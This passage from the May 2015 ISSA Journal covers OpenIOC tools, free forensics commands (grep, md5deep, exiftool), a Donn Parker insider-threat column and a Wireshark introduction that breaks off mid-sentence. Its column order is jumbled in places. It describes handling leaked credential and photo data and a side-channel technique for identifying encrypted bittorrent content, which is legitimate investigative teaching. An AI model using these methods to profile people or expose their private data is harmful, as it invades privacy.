Thanks to our forum sponsors
Special thanks to our dedicated sponsors: Centrify, Dtex Systems, PulseSecure, and Zscaler.

Our next CISO Forums are scheduled as follows:

Las Vegas, Nevada
August 2-3, 2015
Planet Hollywood Las Vegas Resort and Casino
Theme: Third-Party Oversight
Click for event details or member registration.
Chicago, Illinois
October 10-11, 2015
Chicago Marriott Downtown
Event details (TBA). Click here for member registration.

The Open Forum

The Open Forum is a vehicle for individuals to provide opinions or commentaries on infosec ideas, technologies, strategies, legislation, standards, and
other topics of interest to the ISSA community. Open Forum articles are not
intended for reporting news; they must provide insight, opinion, or commentary to initiate a dialog as to be expected from an editorial. Articles
should be 700-800 words and include a short bio and photo. Please submit to
editor@issa.org. Note that accepted articles may be eligible for CPE credits.

ISSA Financial SIG

May 15, 2015
1pm-3pm Eastern/10am-12pm Pacific (web meeting)
Topic: FFIEC Cybersecurity Assessment
Click for registration.

ISSA North Texas Chapter: CISO Roundtable


May 21, 2015: 11:00am 1:00pm; Maggianos Little Italy,

6001 West Park Blvd, Plano, TX. Click for details.

Breach Report: How Do You Utilize It?

2-Hour Live Event: Tuesday, May 26, 2015

9:00am US-Pacific/12:00pm US-Eastern/5:00pm London
Registration information forthcoming.
Once again, the new data breach reports are being published. The question is, will it be another round of the
sky is falling and the world is ending, or are we, as security professionals, finally succeeding in protecting our
This year we would like to look at best practices concerning the content of these reports. How do we make the
best use of the information that is released? Join our industry experts as they discuss the latest breach reports
and provide insight into current trends and potential
Moderator: Matt Mosley

Industry Events

SecureWorld Houston

Regional Cybersecurity Event

May 13, 2015 8:00am 4:30pm
Norris Conference Centre
816 Town & Country Blvd., Houston, TX 77024
ISSASWP: $100 off SecureWorld Plus. ISSA: $50 off Conference Pass. ISSAEO: $25 off the Open Sessions Pass.
Click for information.

SecureWorld Atlanta

Regional Cybersecurity Event

May 27-28, 2015 8:00am 4:30pm
Cobb Galleria Centre (Ballroom)
2 Galleria Parkway Southeast, Atlanta, GA 30339
ISSASWP: $100 off SecureWorld Plus. ISSA: $50 off Conference Pass. ISSAEO: $25 off the Open Sessions Pass
Click for information.

May 2015 | ISSA Journal 13




Working with
of Compromise
By Jason Andress ISSA Senior Member, Puget Sound Chapter
This article discusses indicators of compromise and some of the tools that might be used to work
with them. Discussed are sources of IOC data in OpenIOC format, tools used to manipulate IOC
files, and the deployment of IOC files in an environment to scan for indicators of compromise on
individual hosts.

ndicators of compromise, commonly referred to as IOCs

(pronounced eye-oh-see), typically consist of one or
more artifacts that relate to a particular security incident or attack. The intent of assembling IOCs for a particular
item of malware or type of attack is to be able to state, with
a relatively high degree of confidence, whether or not such
items are present in a given environment. It is very useful, as a
security professional, to be able to provide a data-backed answer the next time executive management asks whether the
POS malware du jour or latest data stealing Trojan is present
in your environment. OICs may be composed of some combination of filenames, hashes, IP addresses, hostnames, processes, services, Windows registry entries, and a host of other
similar information.

Trusted Automated eXchange of Indicator Information

(TAXII), Malware Attribute Enumeration and Characterization (MAEC), Common Attack Pattern Enumeration and
Classification (CAPEC), Incident Object Description Exchange Format RFC 5070 (IODEF), YARA, and a number
of others.

The typical life cycle for use of IOCs in an environment is

something similar to that shown in figure 1.
IOCs are commonly represented using one of several standards specifically created for expressing cyber-threat intelligence information. Several of the standards working toward
similar goals are OpenIOC, Structured Threat Information
eXpression (STIX), Cyber Observable eXpression (CybOX),
14 ISSA Journal | May 2015

Figure 1 IOC life cycle

Working with Indicators of Compromise | Jason Andress

easier to share this information among the
team of people working on the issue and
externally as well, if this is appropriate or

Figure 2 Stuxnet IOC

The standard that I will focus on here is the OpenIOC format

developed by Mandiant (now part of FireEye). The OpenIOC
format is XML-based and consists of indicator terms that describe the artifacts that indicate the specifics of the attack in
question. Figure 2 shows a portion of the IOC file for Stuxnet.1

Why are IOCs Important?

IOCs are important for three main reasons. Firstly, they allow
a particular threat to be documented in a consistent fashion.
If a framework is used to document indicators in a specific way using common terminology, it becomes considerably
1 http://openioc.org/iocs/ea3cab0c-72ad-40cc-abbf-90846fa4afec.ioc.

Secondly, IOCs provide security personnel

with a set of data that can be fed to automation. Given a set of IOCs for a particular
threat, it is possible to scan through an environment to see if any of them exist on the
systems in question. If some level of certainty can be established that files matching a particular hash or processes running
under a certain name are not running in
the environment, this can go a great way
toward easing concerns on compromise
from a particular attack. Such data can also
be used to supplement existing solutions in
place, such as intrusion detection systems
or anti-malware technologies, by providing
an additional set of information on which
to base decisions regarding whether a particular item being examined is malicious or not. IOCs can
potentially also give us a swifter route to implementing detection for new or zero-day attacks for which signatures or
detection rules have yet to be developed for our existing commercial tools.
Thirdly, IOCs can help us provide at least some answers that
security professionals will be asked regarding our environments:
Is this file malicious?

What has this IP done in the past?

How did we get infected?
Are we compromised?

May 2015 | ISSA Journal 15

Working with Indicators of Compromise | Jason Andress

To be sure, IOCs are not a magic bullet, but they are a
potential source of data and a good starting point for further investigation.

Where do IOCs come from?

IOC data typically arrives from one of three places: commercial and industry sources, various free IOC-specific
sources, or any of a number of online security-related
Commercial and industry IOC sources
Commercially produced IOCs are regularly released by
a number of different security vendors. Generally, such
feeds are only released to paying customers and can be
rather spendy. Such services are available from vendors
such as Dell Secureworks, RSA, Norse, Symantec, McAfee, and a host of others.
IOC data is also frequently released by law enforcement, although strictly speaking this is not public data. The FBI Liason Alert System (FLASH) sends alerts on a regular basis
regarding particularly harmful items of malware, predicted
attacks, and other large-scale events of concern to security
professionals. The local FBI liaison2 will have information on
subscribing to these alerts. Individuals may also be able to
gain access to some portion of this information by joining a
local Infragard3 chapter.
Additionally, there are several Information Sharing and
Analysis Center (ISAC) groups that share such information,
typically segmented by industry; for example:

Figure 3 IOC Bucket

the uploaded information for a particular indicator, as can

be seen in figure 3a search was done for mrxcls.sys, a file
known to be related to stuxnet. The file was correctly identified and a link provided to download the associated IOC file
in OpenIOC format. IOC Bucket also helpfully maintains a
Twitter feed that tweets whenever a new IOC has been added.9
In addition to searching the existing information that IOC
Bucket is already aware of, IOC Bucket also allows and encourages new IOCs to be uploaded, which it will then share
with the security community.

The National Council of ISACS7 has a list of participating

groups, although this list is not exhaustive.

I know Google Fu
A bit of googling will often turn up IOC data as well. This may
not always be the case with brand new malware or attacks,
as such events often take several weeks to sort the particulars well enough to get solid IOCs generated. Usually simple
search terms such as stuxnet ioc or blackpos ioc will generate decent results, or, at the very least lead to others who are
discussing the situation. Google Alerts10 can be very helpful
when searching for IOCs relating to new threats.

Free IOC sources

Internally developed IOCs

FS-ISAC4 Financial services

R-ISAC5 Retail

IT-ISAC6 Information technology

IOC data can often be found for free online, sometimes on

specific IOC distribution sites, or sometimes with a bit of creative googling. Many security companies make use of IOCs
in releases discussing new malware or attacks, so it often pays
to do a bit of digging. Even in the case where there is not a
neatly packaged IOC file to use, a list of indicators can often
be gleaned from research done on the particular issue being
IOC Bucket
IOC Bucket8 is a web-based tool for sharing and researching IOCs. It provides a quick and easy method for searching


16 ISSA Journal | May 2015

Cusom IOCs can, of course, also be developed. This does require a certain amount of instrumentation to provide a view
into what is going on with our networks and hosts and likely a
bit of detective work, but has the potential to produce very interesting results. A few places to look for potential IOCs are:
Unusual spikes in incoming or outgoing network traffic
Access from IP addresses in unexpected geographic
DNS logs

Web proxy logs

Connections on unusual ports or protocols

High counts of failed logons
9 https://twitter.com/iocbucketfeed.
10 https://www.google.com/alerts.

Working with Indicators of Compromise | Jason Andress

Unusual database activity

Access across security zones

Hosts that are fumbling11

There are, of course, any number of locations and/or activities that might turn up as being interesting data. IOCs can
be constructed based on reading in the security domain,
information presented at conferences, newly released vulnerability information from vendors, previous incidents,
and so forth. The ultimate measure of how interesting
these types of IOCs end up being lies in deploying them in
our environment.

Tools for working with IOCs

A number of tools exist for working with IOCs, but this
discussion will focus on free sources of such tools here.
Everything covered here is free as in beer, and some
items are free as in speech, as well.
Figure 4 IOC-EDT

Creating and editing IOCs

Although the OpenIOC format is fairly standard XML
and can be edited with any tool that can handle simple text
editing, there are a few tools out there that make this process
a bit less cumbersome. In general, an editor can create new
IOCs in OpenIOC format and easily edit existing ones.
IOC-EDT12 (free and open source) is a web-based tool for creating and editing IOC files. Being web based has the benefit
11 Systematically failing to connect to a target using a reference that an authorized user
would typically know.
12 http://bluecloudws.github.io/ioceditor/.

of being easy to access and use without needing to install, as

well as being platform agnostic. As a somewhat reluctant user
of Windows as an every day OS, I appreciate this.
I have imported and loaded the stuxnet IOC file, and it is
ready for editing (figure 4). IOC-EDT provides a very lightweight tool for working with IOCs.
IOC Editor
IOC Editor13 (free, not open source) is a Windows-only GUI
tool that can build IOCs from scratch, import existing files,
13 http://www.mandiant.com/resources/download/ioc-editor/.

Ship of Tools:
All the Security Tools in the World Cant Save You
If the foundation is weak. Even sophisticated detection tools
cant help you if the infrastructure theyre monitoring is weak.
Think of users with bad passwords--the bad guys are in before hitting any reasonable threshold that would trigger the alarm. And
once they are in, most of their behavior will look normal since they
are now authorized with someone elses credentials.
If you dont know what you have. If you cant track your assets on
the network, youll end up with forgotten, unpatched systems with
an ever-growing assortment of vulnerabilities that your scanners
would detect...if only they knew where to look. And when the bar
is that low, an attacker can take herself from attack mode to normal user mode in minutes, even seconds.
If you have insufficient defense in depth. Layers of security are
key: its while crossing these layers that alarms are triggered, and
those alarms are your best chance of catching the attacker before
the damage is done. In this context, layers mean firewalls, authentication, host intrusion detection tools, file integrity checkers, and
so on.
If you are not paying enough attention. Slapping a monitoring
tool into place and then ignoring the results is a classic mistake. If

you spend lots of money on a sophisticated monitoring tool, be

prepared to then spend more on a human to pay attention to what
the tool is saying. Otherwise, the new tool just means extra work
for a team that was likely running too lean to begin with.
If you are paying too much attention. On the opposite extreme,
its easy to get greedy and try to track all possible anomalies on
the network. If you cant dial down the noise level, youll miss the
signal. Its not necessarily a bad thing to store as much monitoring
data as possible (subject to privacy considerations, etc.). This data
can be very useful for forensics investigations. But on a daily, real-time basis, be disciplined in tuning out the noise.
If you ignore all the guidance above, your security tools will still be useful. They wont stop the
attackers, but theyll be helpful in answering the
question of just how bad your situation is after
the fact.
Dorian Deane
ISSA member, Northern Virginia Chapter
May 2015 | ISSA Journal 17

Working with Indicators of Compromise | Jason Andress

IOCe is very simple to use, with an interface
that most users should catch onto within a few
minutes of use. The major flaws of IOCe are in
its closed-source nature and platform specificity. Fortunately, there are other projects tackling
this very issue.
Last, but certainly not least, is PyIOCe14 (free,
open source), a Python-based answer to IOCe.
PyIOCe is a ground-up attempt to build a fully featured editor like IOCe, but without the
closed-source shackle that prevents the security
community from really digging into the project.
It has much of the same functionality as IOCe
and also aims to include elements of some of the
other indicator standards discussed earlier, such
as CybOX and STIX.

Deploying IOCs
Figure 5 IOCe

and do a diff between two IOC files. IOC Editor (IOCe) with
the Stuxnet IOC file loaded can be seen in figure 5.

Career Opportunities

isit the Career Center to look for a new opportunity. These are among the 1,057 current job
listings you will find [as of 4/30/15]:

Information Security Engineer Specialists Bank

of America, Dallas, Texas; Simi Valley, California;
Jacksonville, Florida; Charlotte, North Carolina; Atlanta, Georgia; Pennington, New Jersey; and Chicago, Illinois
Information Security Director Elon University,
Elon, North Carolina

Deploying IOCs by using them to scan our environment is really where the rubber meets the
road. There are several purpose-built tools for
accomplishing this aim, but any of the myriad of scripting
languages would suit the bill if there was a desire to create a
custom scanning tool for this effort.
Redline15 (free, not open source), a GUI tool specifically created to search systems for signs of malicious activity, can
create a collector script to search specifically for indicators
in an IOC file. Running the Redline wizard for IOC search
collectors will walk you through the process and result in a
directory containing the scripts to use and a readme file with
instructions on how to put these files to use, as shown in figure 6.
Using the Redline IOC collector manually on a large set of
systems may be somewhat labor intensive, but, fortunately,
the set of scripts lends itself well to automation. In a Windows
14 https://github.com/yahoo/PyIOCe.
15 https://www.mandiant.com/resources/download/redline.

Principal Information Security Technologist

Raytheon, Mckinney, Texas
IT Compliance Analyst Midcontinent Independent System Operator, Carmel, Indiana
VP, Director of Information Security Federal
Home Loan Bank of Boston, Boston, Massachusetts
IT Security Analyst Berry Appleman & Leiden, LLP,
San Francisco, California
Information Security Analyst LGE Electronics/
Silicon Valley Lab, Santa Clara, California
Senior Systems/Network Security Engineer
Medical Science & Computing, Bethesda, Maryland
Figure 6 Redline collector instructions
18 ISSA Journal | May 2015







Chicago Marriott Downtown


Working with Indicators of Compromise | Jason Andress

Openioc_scan18 (free,
source) is a plugin for the Volatility Framework19 (free, open
source), a tool for conducting
memory forensics. Being based
on Volatility means that the
scope of what the plugin can
do is a bit more focused, as the
source data is intentionally
more focused on what can be
found in memory.

Figure 7 IOC Finder

environment, there will generally be easy access to psexec

and a brief bit of googling will turn up ready-made scripts
from others that have already put work into solving this very
IOC Finder
IOC Finder17 (free, not open source) is a command line tool
that performs scans against a system based off of IOC files.
This tool is a bit more lightweight than Redline and has the
benefit of being simple to run from command line, if not as
fully featured. IOC Finder running with its default set of
IOCs to search for can be seen in figure 7.
As with Redline, IOC Finder could be scripted to run across
multiple hosts in an environment, although a bit more work
would need to be put into making IOC Finder work for this
purpose. If a quick method of searching a small number of
hosts without a great deal of overhead is desired, IOC Finder
is a good tool for this.
16 http://c-apt-ure.blogspot.com/2014/08/3r4lr-running-redline-remotely-for-live.html.
17 http://www.mandiant.com/resources/download/ioc-finder/.

The Open Forum

The Open Forum is a vehicle for individuals to provide opinions or commentaries on
infosec ideas, technologies, strategies, legislation, standards, and other topics of interest to the ISSA community. Open Forum articles are not intended for reporting
news; they must provide insight, opinion, or commentary to initiate a dialog as to be
expected from an editorial. Articles should be 700-800 words and include a short bio
and photo. Please submit to editor@issa.org.

20 ISSA Journal | May 2015

At the time that this was being written, Openioc_scan was

capable of scanning for 36 different indicators, most of these
related to processes, services,
registry entries, drivers, hooks,
and files. The strength of this
plugin lies in being able to pull
IOC data into the same framework that a researcher or analyst might already be using to
comb through a system that was
suspected of being compromised.

In conclusion
There are a number of great tools available for working with
IOCs, the majority of which are free to use, and all can be
helpful in hunting evil within an organization. The best way
of sorting out which tools will work in a given environment
is to experiment with the different options that are available
and to assemble a purpose-built tool chain.
As the use of IOCs continues to develop and become more
common, there is an expectation of refinement of the standards that are used to share such data, as well as a much more
fully-developed set of tools to support their use. The need for
sharing threat-intelligence data will only increase moving
forward, and research in this area promises to be an interesting thing to watch.

About the Author

Dr. Jason Andress (ISSAP, CISSP, GPEN,

CISM) is a seasoned security professional
with a depth of experience in both the academic and business worlds. In his present and
previous roles, he has provided information
security expertise to a variety of companies
operating globally. He has taught undergraduate and graduate security courses since 2005 and conducts
research in the area of data protection. He has written several
books and publications covering topics including data security,
network security, penetration testing, and digital forensics. He
may be contacted atjason.andress@gmail.com.
18 http://takahiroharuyama.github.io/blog/2014/08/15/fast-malware-triage-usingopenioc-scan-volatility-plugin/.
19 https://code.google.com/p/volatility/.




Free/Open Source Forensics

By Richard Abbott
This article demonstrates some free and open-source (f/oss) tools regularly used by the author
for the purpose of forensic investigations and argues that many basic task can be accomplished
without resorting to expensive proprietary tools.
This article demonstrates some free and
open-source (f/oss) tools regularly used
by the author for the purpose of forensic investigations. The author argues that
many basic task can be accomplished
without resorting to expensive proprietary tools. Included are
examples of software used to scan digital media for known
content or patterns and a demonstration of a side-channel attack on bittorrent encryption.

orensics is a hugely diverse field. I teach a law class

within a forensics department, and all of my students
dream of taking the stand as an expert witness in support of a prosecutor. They are chasing the CSI fantasy. The
reality is that very few investigations involve courtrooms,
police officers, lawyers, or even crimes. Most investigations
occur within private corporations. They arent CSI:Miami;
nobody is ever murdered via webcam. But they are often just
as equally stressful on investigators. Real-world police investigators are virtually never racing to meet a deadline. Court
dates can be pushed back. Custody of a criminal can be maintained pending investigation. But time is absolutely always a
factor in the private sector. A CSI-type investigator can take
his time to thoroughly examine an issue before drafting a
tidy report. The corporate investigator has five bosses on the
phone all demanding answers yesterday. The full and tidy report might come later, if anyone bothers to read it. The corporate investigator must be able to generate results quickly.
The reliance on commercial tools by courts is overstated. Experts testify and give evidence, not their tools. The fact that
a tool is open source, without a big shiny company behind it,
does not mean that it is any less reliable. Most forensics tools
are nothing more than search engines. They scan large data
sets for material fitting known patterns corresponding to useful evidence. The tool used for a search is literally irrelevant in

Figure 1 - Scanning for the pattern doe.gov with grep

court. The found evidence matters because it is the material

actually being admitted as relevant evidence. Whether that
evidence is unearthed by Encase or Linux doesnt matter.
Basic tools still matter. The reality is that many investigative
tasks can be accomplished without resorting to cumbersome
and expensive tools. All of the tools discussed here are free, as
in free and open source. Mastering them does not require any
great skill beyond a willingnesses to read instructions and the
courage to forgo the friendly interfaces of commercial software.

Searching with grep

A couple years ago 150 million email/password pairs belonging to Adobe customers appeared online. Human beings reuse email/password pairs and so there was a likelihood that
these pairs could be used elsewhere. Because this data was
initially distributed via filesharing, several organizations requested that I acquire and analyze as many copies as I could
locate. They had only one question: Are any of our corporate
or client email addresses present in the Adobe data? Most
thought this would be a difficult task. One sent me a list of
two thousand email addresses and a one-week deadline to
propose a budget. I had full results within a couple hours (figure 1). All it took was a single terminal command and bit of
$ grep -f Client_Emails.txt Adobe_Leak.txt >
Grep is a very old tool for locating patternstextwithin
files. In this case I invoked the -f flag to direct grep to take
my list of email addresses from a file (Client_Emails.txt) and
May 2015 | ISSA Journal 21

Free/Open Source Forensics Tools | Richard Abbott

search for them within the Adobe data
(Adobe_Leak.txt). The
> command
dumped the results to a new text file
ready to email. Importantly, grep does
not open any of the files it searches.
Opening a list of 150 million email addresses in something like Excel would be
extremely painful. Grep instead crawls
through files one line at a time. There is
no practical limit on file size and no minimum system requirements. Grep can
run on the most basic of machines. The
only issue is speed. Searching the Ado-

be data for a thousand email addresses

took some time on a desktop machine. A
cloud instance would have been far faster but neither would require the days my
client expected.

Verifying files across time and


A key part of any forensic investigation is

assuring that the files you handle today
are identical to those you handled previously. After physically securing data,
a good first step is to hash every seized

file. These hashes can later be used to detect any changes. Standard proprietary
forensics tools such as Encase contain
powerful hashing tools. In reality these
are little more than a fancy interface.
The underlying hashing algorithms are
publicly available and most have been
released to the public via various open
source licenses. A 256-bit SHA hash of
a file by Ecase is no better or worse than
one by free and open source projects such
as sha256sum. There is only one correct
output no matter which tool is used.
During the infamous iCloud hack I was
contacted by an attorney for a corporation that had caught an employee downloading leaked photos to a company
computer. They feared that this behavior
was not unique and needed a tool to scan
for the offending images across multiple
platforms. Needless to say, they did not
want to have to download the images in
order to make a comparison manually.
Searches for offending filenames were
turning up too many false positives (i.e.,
001.jpg). Instead I took hashes of the
leaked files and created a blacklist. These
hashes, not files or even file names, were
used by internal investigators when scanning company machines. I did this using
md5deep, a program famously written
by Jesse Kornblum during his time as an
investigator with the Air Force Office of
Special Investigations. If you know your
copyright law, that makes the software
public domain within the United States.1
$ md5deep -r * > icloud_hashes.
This command hashes all files within a
directory and subdirectories (-r for recursive) and outputs them to a file. I ran
it from a directory on a cloud instance
where I had collected troves of leaked
images (figure 2).
This file was sorted and deduped to remove unnecessary data such as file
names, resulting in a simple list of hashes disconnected from the files from
which they were taken. Internal investigators used this list while scanning for
leaked files possibly stored on company
machines, again using md5deep.
1 Copyright protection under this title is not available
for any work of the United States Government, 17 U.S.
Code 105. See https://www.law.cornell.edu/uscode/

22 ISSA Journal | May 2015

Free/Open Source Forensics Tools | Richard Abbott

Figure 2 - Output of md5deep showing hashes and file names

$ md5deep -r -m icloud_hashes.txt *
The -m flag tells to match files against the list of known hashes and output any such matches. There is no need to output
the results to a file. Any results, any matches, would warrant
further investigation by hand. In reality the command used
was slightly more complex. There were additional commands
instructing md5deep to skip large files for purposes of speed
and to use a list of hashes stored at a shared network location that I updated as new leaks appeared. The novel aspect of
this internal investigative sweep was that none of the people
handling the company computers had access to any leaked
data, reducing any accusations that they could have planted

Finding metadata with Exiftool

In addition to finding and tracking leaked files, many of the
celebrities ensnared in the iCloud hack worried about metadata associated with their personal images. Modern cameras,
especially smart phones, attach all sorts of information to the
photos they take. Top of the worry list were GPS locations
stored within Exchangeable Image File Format data (exif).
Luckily a free tool exists for handling exif data: Exiftool.2 A
quick test confirmed that indeed a great many of the leaked
images contained GPS data.
$ exiftool -r -GPSLatitude * > GPSresults.txt
This command calls for Exiftool to scan for files containing
GPS latitude tags and out output the results to a file. As you
2 http://www.sno.phy.queensu.ca/~phil/exiftool/.

can see, the output format was less than ideal (figure
3a). With a little command-line savvy it was cleaned
up considerably. Using a pipe (the vertical bar
| ) to feed the output of Exiftool into grep, I created a tidy list of latitude-longitude pairs. These were
then mapped to physical locations, mostly celebrity
homes, so that any physical security implications
could be evaluated (figure 3b).
$ exiftool -r -S -GPSLatitude -GPSLongitude * |
grep -E GPSLatitude|GPSLongitude > results.txt

Cracking encrypted traffic with Wireshark

Every corporate investigator has at some point been handed
a device, usually a laptop, with the onerous instruction find
out whats wrong with this thing! Whenever a networked
device seems to slow down, some people think it has been
hacked. They assume that someone might be exfiltrating data
from it to somewhere else. My first step when looking at suspect device is always to listen first. I connect it to a dummy
router and see if it is trying to talk to anyone. To do this I use
the old networking standby: Wireshark.
A device at rest should remain at rest. The screenshot in figure
4 is from one of my home machines. After several minutes
the only traffic sent was from me trying to resolve Google.
com using the dig command. Anything more and I would be
Deploying Wireshark can be tricky. Listening to network
traffic in and out of the machine on which Wireshark is running is easy. Thats just a matter of hitting record. But to listen in on traffic between two other machines, to eavesdrop,
one must split or mirror traffic. Once upon a time local networks were built on hubs that mirrored traffic amongst all
network participants. That was horribly inefficient. So todays
networks rely on routers to send traffic to the specific locations as it is needed. Listening on a modern switched network
requires special hardware because no one point is privy to
all the traffic. Some commercial switches, called managed
switches, have facilities to mirror traffic for purposes of monitoring, but these are only of use where the total traffic does
not exceed the capacity of the output line.
The possible uses of Wireshark are infinite. So for purposes
of example let us look at it capturing some bittorrent-related
traffic and see what we can do with it.

Figure 3a Initial ExifTool GPS results

Figure 3b ExifTool GPS results

Figure 5 is from a live capture. Once we have stopped and

saved the capture we can limit our view to only recognizable

Figure 4 Wireshark monitoring an air-gapped machine

May 2015 | ISSA Journal 23

Free/Open Source Forensics Tools | Richard Abbott

Figure 5 Monitoring a machine sharing files via bittorrent

requested handshakes are ignored. But

they did arrive and were recorded. Here is
the big secret: these packets can be used to
crack the encrypted bittorrent traffic and
identify the material I am sharing. Wireshark is all you need. No doubt this represents a serious unpatched security hole.
Using Wireshark to examine an individual handshake packet, we see something
important (figure 7). SHA1 Hash of info
dictionary: 546cf15f724d19c4319cc17b179d7e035f89c1f4. That is a hash of the
content being shared.

Figure 6 Wireshark identified unencrypted bittorrent packets

Figure 7 Extracting hash data from a bittorrent packet

bittorrent packets (figure 6). From several thousand packets

we now have seven. Yes, seven tiny packets. The problem with
the bittorrent protocol is that it has evolved to combat throttling by ISPs. Bittorrent traffic is encrypted. Even Wireshark
cannot distinguish its packets.
So why these seven? Look closely at figure 6 an you will notice
two commonalities: all seven have been described by Wireshark as handshakes, and all seven are inbound packets.
They are arriving from the external Internet. None originates locally. They come from poorly-configured bitorrent
peers that have failed to properly implement encryption. As
my machine does not want to talk to such machines, their

An investigator could compare that hash

to a list of known hashes, but unless you
are the NSA/FBI/MIB you probably do
not have a list of hashes associated with
random bittorent shares. Instead, a savvy
filesharing expert can turn that hash into
a magnet link and then connect to various
torrent tracking services to identify the
content. Here is that magnet link:
Once handed to Transmission, an open source bittorrent client, we quickly discover exactly what I was sharing (figure 8).
This side-channel attack is how experts break encrypted bittorrent traffic to identify content. It is a serious flaw that has
yet to be properly patched. Until all bittorrent clients force
encryption, it remains a serious flaw.

Hopefully this brief description of a handful of tools demonstrates that it is possible to perform some basic forensics without resorting to expensive tools.
sha256sum: http://www.gnu.org/software/coreutils/.
MD5deep: http://md5deep.sourceforge.net/.

Figure 8 Shared files are identified via Transmission

24 ISSA Journal | May 2015

ExifTool: http://www.sno.phy.queensu.ca/~phil/exiftool/.

Free/Open Source Forensics Tools | Richard Abbott

Wireshark: https://www.wireshark.org/.
All images are screenshots taken by the author of free/opensource software running on his machines. File names and
other distinguishable data have been redacted to protect the
privacy of clients.

About the Author

Richard Abbott is an attorney and IT consultant out of Vancouver, Canada. He teaches at

the British Columbia Institute of Technology
and co-chairs the American Bar Associations
information security committee. An expert
on all things filesharing, Richard was consulted by several of the legal teams tackling the iCloud hack.
He may be reached at rabbit@shaw.ca.

Donns Corner
By Donn Parker

ISSA Distinguished Fellow

Silicon Valley, USA Chapter

The Trusted Persons

Security Therat


persons (insiders) violating their trust. This includes employees,
officers, contractors, customers, partners, auditors, cloud personnel, and visitors. These trusted people are commonly called insiders as opposed to outsiders, but this jargon implying just to people within the enterprise is deceptive. That is why I use the terms
trusted and non-trusted. Of course, adversaries become in some
sense the equivalent of trusted persons as they gain capability to
do harm. They become unknown irregular trusted persons.
Trusted persons are those having control, custodianship, and possession of enterprise monetary, human, and physical assets and
sufficiently detailed knowledge of them to cause harm. It is difficult to determine who are in highest and lowest levels of trust
in terms of who could do the most damage. It is possible to overlook some high-trust individuals. Those with responsibility for the
safety of others such as guards rank high. Computer programmers
and janitorial and maintenance staffs who can do much financial
and product damage without detection are up there. Now programmers have control over life-threatening applications such as
robotics and autonomic human functioning. Information security
specialists are in particularly high-trust positions since they have
responsibilities for protecting the most valuable assets.
Helpful security controls and practices over trusted people include:

Segregation of duties
Dual control
Workplace observation


ISSAs Pre-Professional
Virtual Meet-Up Series

May 14, 6:30pm 8pm Eastern: Penetration Testing

August 13, 6:30pm 8pm Eastern: Networking,
Mentoring, and Continuing Education
November 19, 6:30pm 8pm Eastern: A Day in the
Life of a Forensic Scientist
Visit the ISSA YouTube Channel to listen to the Ask the
Experts pilot episode: www.youtube.com/watch?v=3_

Access to confidential personal problem-solving services

Enforcement of policies and codes of ethics
False data entry detection and mitigation
Egress restrictions
Mandatory full vacations
These information security practices and controls were effective
when the workplace was limited to computer proximity and locations of physical output, but now with remote and mobile access
the workplace extends to any Wi-Fi hot spot. Restricting transactions to secure office spaces has diminished. And the strongest
and most effective security controls and practices dealing with
the trusted-person threat would amount to privacy invasion such
as constant observation and other violations of constitutional
rights. In the extreme this puts information security ultimately
and squarely at odds with human rights.
Here are some trusted-person maxims to consider:
75. Balancing enterprise security with protection of trusted-peoples rights is the ultimate security control issue.
76. We are unable to anticipate sufficiently all of the unknown
vulnerabilities and attacks before our increasingly intelligent
and capable unknown cybercrime adversaries do.
77. Safety is a part of security.
78. Segregation of duties and dual control are sometimes effective alternatives to one another.
79. Ethics and law preclude enterprises from taking excessively
vigorous security actions.
80. The security basics provide us with the equivalent of locked
doors, moats, thick walls, auditors, forensics, and recovery,
but with a big enough hammer and sufficiently effective
deception, trusted people can break anything.
81. Deterioration and violation of controls and practices by
trusted people is a constant problem and requires continued
Donn Parker, CISSP, retired, Distinguished Fellow, and
information security pioneer, donnlorna@aol.com.
May 2015 | ISSA Journal 25





By Didier Stevens ISSA member, Belgian Chapter

This article is a quick introduction to Wireshark as a security tool. After discussing capturing,
filtering, and analyzing traffic, we look at a couple of scenarios.

ireshark is the number one network security tool

according to SecTools.org top 125 Network Security Tools survey.1 It is a free, open-source packet-analysis tool that was known as Ethereal until a trademark
dispute in 2006 forced its author, Gerald Combs, to rename it.
I am sure you use packet-analysis tools if you are a network
(security) professional, and that you know Wireshark. Maybe you even use it regularly. But other security professionals
can benefit from using Wireshark too. For example, malware
analyst can use (and extend) Wireshark to analyze botnet
Wireshark supports, of course, IPv4/IPv6 and TCP/UDP,
the staple protocols of office networks. But it also supports
protocols that lie outside the field of network professionals,
like Bluetooth, serial infrared, GSM, and more. Telecom engineers will also find Wireshark to be a valuable tool.

A brief overview
Wireshark runs on many operating systems like Windows,
Linux, and OSX. It has a graphical user interface (GUI), but
when you install Wireshark, you get many more tools like
TShark, which is a full-featured command-line version of
Wireshark that uses a text-terminal interface. Wireshark
comes in 32-bit and 64-bit versions. As network captures can
be quite large and require much memory for analysis, the 64bit version is a welcome addition.
Wireshark can capture network traffic, analyze and display
network traffic, and save captured network traffic to disk. On
Linux and OSX, Wireshark captures traffic from the network
interfaces via libpcap; though it does not exist on Windows,
there is a free, open source equivalent called WinPcap. WinPcap comes bundled with the Windows setup binaries for
Wireshark. With WinPcap, Wireshark on Windows can capture network traffic from the network interfaces.

The art of capturing traffic

Many claim that network traffic capturing is an art in itself.
Often beginners will just install Wireshark on the machine
they want to analyze and start capturing. But that is just one
option they have. You need to decide where in the network
1 http://sectools.org/.

26 ISSA Journal | May 2015

you will capture traffic: at the workstation, at the server, at

the router? You need to decide when you will capture, and
what traffic to capture. And Wireshark is not the only tool
to capture network traffic. For example, there are specialized
hardware devices (network taps) that you can tap in the network cable of your workstation, server, etc. With such devices
you do not need to install Wireshark on a machine to be able
to capture its network traffic.
Many operating systems have provisions for capturing traffic
too. On Linux and OSX, you can use tcpdump to capture traffic, and on Windows netsh is the tool to use.2 And network
devices like routers, firewalls, and proxies can often capture
network traffic that flows through them.
Think first before you install Wireshark. Think where, what,
and how you will capture network traffic.
Wireshark can also capture traffic from Wi-Fi interfaces, with
some limitations. When a Wi-Fi network card is associated
with a Wi-Fi access point, Wireshark can capture the network traffic addressed to it, but in promiscuous mode it can
capture all network traffic on the channel of the access point
it is associated with. To capture traffic from a Wi-Fi channel without associating, a Wi-Fi network card has to support
monitoring mode. On Linux and OSX, this is possible with
the right Wi-Fi network card. But not on Windows; you need
to use a specialized adapter called AirPcap. On Windows,
Wireshark also can not capture traffic from special virtual
network adapters, like PPTP VPN adapters.

Filtering traffic
It can be quite overwhelming when you start analyzing all the
network traffic captured on a server. There can be so many
conversations that you will have a hard time finding all the
packets relevant to the traffic you are interested in. Being able
to filter network traffic according to your taste would be very
useful. And as can be expected from a feature-rich tool like
Wireshark, it has many options to filter traffic.
Wireshark allows you to specify a filter to be applied when
capturing network traffic (this filter is actually active at the
